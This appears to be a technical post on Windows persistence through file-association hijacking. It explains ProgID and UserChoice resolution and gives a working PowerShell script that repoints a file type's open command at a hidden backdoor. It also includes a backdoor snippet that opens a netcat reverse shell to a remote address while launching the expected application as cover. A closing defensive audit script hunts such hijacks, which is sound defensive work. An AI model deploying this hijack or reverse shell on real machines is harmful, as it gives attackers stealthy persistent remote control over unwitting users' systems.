Hijacking file associations is the same basic idea as hijacking shortcut files: the command Windows runs when the user opens a file of a given type is replaced with one that also launches the attacker's payload. Finding the command to replace is a two-step process.

  1. Locate the “programmatic ID” (ProgID) for the extension you wish to hijack: the key HKLM\Software\Classes\<ext> (for example .txt) holds it as its (Default) value.
  2. The ProgID is itself a key under HKLM\Software\Classes, and the (Default) value of its shell\open\command subkey is the command line Windows runs to open the file.

Two caveats worth checking before editing anything. HKLM\Software\Classes and HKCU\Software\Classes are merged into HKEY_CLASSES_ROOT, and the HKCU entry wins on conflict, so an unprivileged user can hijack an association for their own account without touching HKLM at all. On Windows 8 and later, a default the user picked explicitly is stored under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\<ext>\UserChoice and overrides the extension key's ProgID, so confirm which ProgID actually wins for the extension before changing its command.
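
The two steps above, carried through as an added example (not code from the original post): the script resolves the ProgID that really handles the extension, reads its open command, and repoints it at a backdoor script that forwards %1. The backdoor path is a hypothetical placeholder, and writing under HKLM needs an elevated shell; pass -Scope CurrentUser to hijack only HKCU\Software\Classes, which needs no elevation. Run it with -WhatIf first to see the change without applying it.

```powershell
# Added example, not code from the original post. Resolves which ProgID and
# command actually handle an extension, then repoints the command at a
# backdoor script that forwards %1. The backdoor path is hypothetical.
# Writing under HKLM requires an elevated shell; -Scope CurrentUser writes
# only to HKCU\Software\Classes. Run with -WhatIf to preview the change.
[CmdletBinding(SupportsShouldProcess)]
param(
    [string]$Extension = '.txt',
    [string]$Payload   = 'C:\Users\Public\open.ps1',   # hypothetical backdoor script
    [ValidateSet('Machine', 'CurrentUser')]
    [string]$Scope     = 'Machine'
)

# HKEY_CLASSES_ROOT is the merged view of HKLM\Software\Classes and
# HKCU\Software\Classes, with the HKCU entry winning on conflict.
if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}

function Get-DefaultValue([string]$Path) {
    # The (Default) value of a key is read with an empty value name.
    $key = Get-Item -Path $Path -ErrorAction SilentlyContinue
    if ($key) { $key.GetValue('') }
}

# Step 1: find the ProgID. An explicit per-user default (UserChoice) overrides
# the extension key's (Default) value, so check it first.
$userChoice = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$Extension\UserChoice"
$progId = (Get-ItemProperty -Path $userChoice -Name ProgId -ErrorAction SilentlyContinue).ProgId
if (-not $progId) { $progId = Get-DefaultValue "HKCR:\$Extension" }
if (-not $progId) { throw "No ProgID registered for $Extension" }

# Step 2: the ProgID's shell\open\command holds the command line, with %1
# standing in for the path of the file being opened.
$commandKey = "HKCR:\$progId\shell\open\command"
$original   = Get-DefaultValue $commandKey
if (-not $original) {
    throw "$progId has no shell\open\command (an AppX or DelegateExecute handler, perhaps)"
}
Write-Host "$Extension -> $progId -> $original"

# Build the replacement. "%1" stays quoted so a path with spaces reaches the
# backdoor script as a single argument.
$hijacked = "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$Payload`" `"%1`""

$hive   = if ($Scope -eq 'Machine') { 'HKLM:' } else { 'HKCU:' }
$target = "$hive\Software\Classes\$progId\shell\open\command"

if ($PSCmdlet.ShouldProcess($target, "set (Default) to $hijacked")) {
    # Keep the original command so the association can be restored later.
    $original | Out-File -FilePath "$env:TEMP\${progId}.command.bak" -Encoding ascii
    # Creating the key under HKCU shadows the HKLM one for this user only.
    New-Item -Path $target -Force | Out-Null
    Set-ItemProperty -Path $target -Name '(default)' -Value $hijacked
    # Verify through the merged view, which is what the shell consults.
    Get-DefaultValue $commandKey
}
```

The restore path is the reverse: write the saved command back to the same key, or delete the HKCU copy of the ProgID so the HKLM entry shows through again.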

The command under the ProgID will almost always contain a %1 placeholder, which Windows replaces with the path of the file being opened (usually written as "%1" so that paths containing spaces survive as one argument). The backdoor therefore has to accept that path and hand it on to the real application, which requires a slightly different script from the one used to backdoor shortcuts:

# Create a reverse shell (note that netcat is something that
# the attacker needs to provide themselves; it is not part of
# Windows)
#
Start-Process -NoNewWindow "C:\Windows\System32\nc.exe" `
    "-e cmd.exe 1.2.3.4 1337"

# Fire off the application the user is expecting and pass in
# the supplied file path (everything Windows substituted for %1)
#
C:\Windows\System32\notepad.exe "$args"

Note the quoting here, as well as the inclusion of the entire $args array. Most of the documentation I’ve found online suggests using $args[0] as an unquoted argument, but this approach did not work in my testing. If the hijacked command passes %1 without surrounding quotes, a path containing spaces reaches the script as several elements of $args; "$args" joins them back together with spaces, whereas $args[0] keeps only the first fragment.
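
From the defender's side, the same registry layout makes hijacks easy to hunt for. The audit below is an added example (not code from the original post): it walks every ProgID in HKEY_CLASSES_ROOT and flags open commands that launch a script interpreter, reference a user-writable directory, or drop the %1 placeholder, plus any ProgID that exists in both HKCU\Software\Classes and HKLM\Software\Classes with differing commands, which is the footprint of a per-user hijack regardless of what the command looks like. The interpreter and path patterns are assumptions chosen for triage rather than an allowlist, so expect a few benign hits (rundll32 handlers in particular) to review by hand.

```powershell
# Added example, not code from the original post: an audit for hijacked
# file associations on the local machine. The interpreter and path patterns
# are triage heuristics (assumptions), not a complete allowlist.

if (-not (Get-PSDrive -Name HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}

# Script hosts and LOLBins that rarely belong in a document handler. -match is
# case-insensitive by default in PowerShell.
$interpreters = 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32'
# Directories a standard user can write to; a handler living there is a red flag.
$userWritable = '\\Users\\|\\Temp\\|\\ProgramData\\|\\AppData\\|\\Public\\'

function Get-OpenCommand([string]$Root, [string]$ProgId) {
    # (Default) value of <root>\<ProgId>\shell\open\command, or $null if absent.
    $key = Get-Item -Path "$Root\$ProgId\shell\open\command" -ErrorAction SilentlyContinue
    if ($key) { $key.GetValue('') }
}

function Test-SuspiciousCommand([string]$Command) {
    # Returns the reasons the command deserves a look; nothing means it passed.
    $reasons = @()
    if ($Command -match "\b($interpreters)\b")  { $reasons += 'script interpreter' }
    if ($Command -match $userWritable)           { $reasons += 'user-writable path' }
    if ($Command -notmatch '%[1lL*]')            { $reasons += 'file path not forwarded' }
    $reasons
}

$findings = foreach ($key in Get-ChildItem -Path 'HKCR:\' -ErrorAction SilentlyContinue) {
    $progId = $key.PSChildName
    $cmd = Get-OpenCommand 'HKCR:' $progId
    if (-not $cmd) { continue }

    $reasons = @(Test-SuspiciousCommand $cmd)

    # A ProgID defined in both hives with different commands means the user's
    # copy is shadowing the machine default for this account.
    $machine = Get-OpenCommand 'HKLM:\Software\Classes' $progId
    $user    = Get-OpenCommand 'HKCU:\Software\Classes' $progId
    if ($machine -and $user -and $machine -ne $user) { $reasons += 'HKCU shadows HKLM' }

    if ($reasons) {
        [pscustomobject]@{
            ProgId  = $progId
            Command = $cmd
            Reasons = ($reasons -join ', ')
        }
    }
}

$findings | Sort-Object ProgId | Format-Table -AutoSize -Wrap
```

Run it once on a known-clean build and keep the output as a baseline; on later runs, anything new in the list is the interesting part, and the 'HKCU shadows HKLM' reason alone is worth an alert since legitimate software almost never registers a per-user copy of a ProgID it also installs machine-wide.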